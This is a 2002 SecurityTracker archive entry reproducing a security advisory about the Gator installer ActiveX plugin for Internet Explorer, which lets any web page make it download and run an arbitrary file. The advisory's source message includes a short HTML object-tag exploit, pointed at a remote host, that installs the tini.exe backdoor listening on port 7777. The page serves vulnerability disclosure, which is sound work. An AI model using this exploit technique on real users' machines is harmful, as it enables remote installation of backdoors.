SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Report a Bug
Report a vulnerability that you have found to SecurityTracker -- bugs@securitytracker.com
Questions?
Want to learn about SecurityTracker? We've got answers to frequently asked questions right here
Sign Up!





Category:  Application (Generic)  >  Gator Vendors:  Gator Corporation
Gator Plugin for Microsoft Internet Explorer Lets Remote Users Install Arbitrary Software on the User's Host
Date:  Feb 20 2002
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Advisory:  Eye on Security
Version(s): 3.0.6.1
Description:  Eye on Security reported a vulnerability in the Gator plugin for Internet Explorer. Remote users can install software on the user's host and gain access to the host.

It is reported that a vulnerability exists in the plugin that installs the Gator software. A remote HTML page can apparently specify the location of the Gator installation file. After the installation file is downloaded, the file is executed.

A remote user could create an HTML page which to make use of the Gator ActiveX installation component to point at a trojan file and cause that file to be installed on the user's host.

A demonstration exploit is provided in the Source Message. The exploit installs 'tini.exe', a trojan that listens for connections on port 7777. Information about this trojan is available at:

http://www.ntsecurity.nu/toolbox/tini/

The demonstration exploit example is available at

http://eyeonsecurity.net/advisories/gatorexploit
Impact:  A remote user can create an HTML page that, when loaded by another target user, will cause arbitrary code to be installed on the target user's computer.
Solution:  No vendor solution was available at the time of this entry.

The author of the report recommends deleting the ActiveX component from %windir%\Downloaded Program Files.
Vendor URL:  www.gator.com/ (Links to External Site)
Cause:  Access control error
Underlying OS:  Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Feb 25 2002 (Vendor Issues Fix) Re: Gator Plugin for Microsoft Internet Explorer Lets Remote Users Install Arbitrary Software on the User's Host
The vendor has released a fix.


 Source Message Contents
Date:  Wed, 20 Feb 2002 17:31:59 -0500
Subject:  Gator installer Plugin allows any software to be installed

 

Advisory Title: Gator installer Plugin allows any software to be
installed 

Release Date: 21/01/2002

Application: Gator installer plugin for Internet Explorer (GAIN)


Platform: Windows clients with Internet Explorer.

DLL version - 3.0.6.1


Severity: Malicious users can install backdoor software and gain easy
access to the target machine.

Author: 
Obscure^ 
[ obscure@eyeonsecurity.net ]

Vendor Status: 
Not informed.

Web: 

http://www.gator.com
http://eyeonsecurity.net/advisories/gatorieplugin.html 


Background.

(extracted from 
http://gator.com)

Features: 
Fills in FORMS without typing!
Remembers PASSWORDS automatically
Protects and encrypts your data on YOUR computer
Gator comes bundled .. etc 

The vulnerabity exists in a plugin which installs the actual software.
This plugin is scriptable and an HTML page to specify the location of
the Gator installation. This activeX component is usually installed from
this page:  
http://www.gator.com/download/msie.html 

Problem.

The issue here is that any HTML page can specify the location of the
Gator installation file. The installation file is downloaded, then it is
checked for the filename. If the filename is setup.ex_, it is then
decompressed and executed. If the file is not compressed it will still
execute it. Of course using this method, a malicious user can easily
create an HTML page which makes use of the rogue ActiveX component to
point at a trojan file. 


Exploit Example.

<xbject
         id="IEGator"
         classid="CLSID:29EEFF42-F3FA-11D5-A9D5-00500413153C"
        
codebase="http://www.gator.com/download/2500/iegator_3061_gatorsetup.cab"
         align="baseline"
         border="0"
         width="400"
         height="20">
<pxram name="params"
        
value="fcn=setup&src=eyeonsecurity.net/advisories/gatorexploit/setup.ex_&bgcolor=F0F1D0&
aic=",aicStr,"&">
</xbject>

I set up a small demonstation which installs tini.exe (which is a trojan
listening on port 7777). 
If you need any information about tini.exe check out
http://www.ntsecurity.nu/toolbox/tini/.
The exploit example is found at :
http://eyeonsecurity.net/advisories/gatorexploit

Fix.

Simply delete the ActiveX component from %windir%\Downloaded Program
Files .. i think that should fix it.


Disclaimer.

The information within this document may change without notice. Use of
this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any consequences whatsoever
arising out of or in connection with the use or spread of this
information. Any use of this information lays within the user's
responsibility.


Feedback.

Please send suggestions, updates, and comments to:

Eye on Security
mail : obscure@eyeonsecurity.net
web : http://www.eyeonsecurity.net


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC